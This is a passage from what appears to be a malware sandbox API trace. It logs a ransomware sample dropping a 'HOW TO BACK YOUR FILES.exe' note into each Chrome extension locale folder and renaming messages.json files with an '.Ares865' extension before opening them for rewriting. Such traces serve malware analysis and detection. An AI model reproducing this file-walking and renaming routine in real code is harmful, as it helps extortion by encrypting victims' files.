Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr" [0101.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr" [0101.657] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.657] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.658] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.658] GetLastError () returned 0x0 [0101.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fc6680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e67e4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e67e4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.658] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.658] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.658] lstrlenW (lpString="messages.json") returned 13 [0101.658] lstrlenW (lpString="Ares865") returned 7 [0101.659] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.659] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.Ares865") returned 160 [0101.659] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205) returned 1 [0101.663] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th" [0101.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th" [0101.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.664] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.665] GetLastError () returned 0x0 [0101.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fc6680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e67e4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e67e4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.665] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.665] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.665] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.665] lstrlenW (lpString="messages.json") returned 13 [0101.665] lstrlenW (lpString="Ares865") returned 7 [0101.665] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.665] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.Ares865") returned 160 [0101.665] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.667] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=293) returned 1 [0101.670] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te" [0101.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te" [0101.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.671] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.671] GetLastError () returned 0x0 [0101.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.672] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fa0520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6a4620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6a4620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.672] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.672] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.672] lstrlenW (lpString="messages.json") returned 13 [0101.672] lstrlenW (lpString="Ares865") returned 7 [0101.672] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.672] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.Ares865") returned 160 [0101.672] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.674] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=277) returned 1 [0101.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta" [0101.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta" [0101.687] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.687] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.688] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.688] GetLastError () returned 0x0 [0101.688] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fa0520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6a4620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6a4620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.688] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.688] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.688] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.688] lstrlenW (lpString="messages.json") returned 13 [0101.688] lstrlenW (lpString="Ares865") returned 7 [0101.689] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.Ares865") returned 160 [0101.689] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.690] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=336) returned 1 [0101.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw" [0101.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw" [0101.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.694] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.694] GetLastError () returned 0x0 [0101.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fa0520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6a4620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6a4620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.695] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.695] lstrlenW (lpString="messages.json") returned 13 [0101.695] lstrlenW (lpString="Ares865") returned 7 [0101.695] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.Ares865") returned 160 [0101.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 